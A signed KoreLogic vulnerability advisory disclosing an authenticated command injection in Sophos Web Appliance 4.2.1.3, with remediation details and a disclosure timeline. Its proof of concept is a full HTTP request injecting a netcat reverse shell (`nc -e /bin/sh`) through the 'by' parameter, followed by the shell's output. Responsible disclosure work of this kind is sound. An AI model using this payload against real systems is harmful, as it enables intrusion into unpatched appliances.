-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2016-009 : Sophos Web Appliance Remote Code Execution Title: Sophos Web Appliance Remote Code Execution Advisory ID: KL-001-2016-009 Publication Date: 2016.11.03 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Apppliance Affected Version: v4.2.1.3 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-88: Argument Injection or Modification Impact: Remote Code Execution Attack vector: HTTP 2. Vulnerability Description An authenticated user of any privilege can execute arbitrary system commands as the non-root webserver user. 3. Technical Description Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as: POST /index.php?c=logs HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 305 Connection: close STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1 HTTP/1.1 200 OK Date: Tue, 10 May 2016 15:35:05 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 207 {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 4:35 PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"} -- The vulnerable parameters are: by, request_id, and txt_filter_domain That request launches the following process on the SWA: 1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c /opt/perl/bin/salp-generate-report.pl --report=Filter --res=- --type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA==' --start='2016/05/10' --end='2016/05/10' --action='' --sid=590fca17b230e8cdba0394cfa28ef2eb From the shell launched via netcat: id;uname -a;uptime uid=1000(spiderman) gid=1000(spiderman) groups=1000(spiderman),16(cron),44(tproxyd),45(wdx) Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux 15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15 4. Mitigation and Remediation Recommendation The vendor has issued a fix for this vulnerability in Version 4.3 of SWA. Release notes available at: http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos 2016.09.14 - Sophos requests KoreLogic re-send vulnerability details. 2016.09.28 - KoreLogic requests status update. 2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October. 2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week. 2016.11.03 - Public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt -----BEGIN PGP SIGNATURE----- iQEcBAEBCAAGBQJYG8d6AAoJEE1lmiwOGYkMXzMH/iTykJJD1SN3Fe0yIRnky54g w16K2PzvGO4jxXrxpMjuv63zlW5dWWnCXF2UeH+GK2r+R0sr5BHkwzhvu59yMIwm ER2hdpYE+pV4EHf/OPzFT/Zv0GDaf3sKepXaG84tWOOTlncSTJj3dBPOVIP015yb cSDn+ikzwJuJmoXtGH5Y/1y03ykY/T33zWKYp+8f40mQzua/33b47AUbgUIzCYrZ kuQn34kYqrxQkHH1blXPnxWUhrNisHKh8qn/gK5+WvqN0vSSbfBfR1lkkBXtMmwm oA2Y0hdg33btEacqIrAlb5iBrUyjBmX5t2C/Vec3k/cmvBSe5p97lrgNo1ZSOY0= =H28S -----END PGP SIGNATURE-----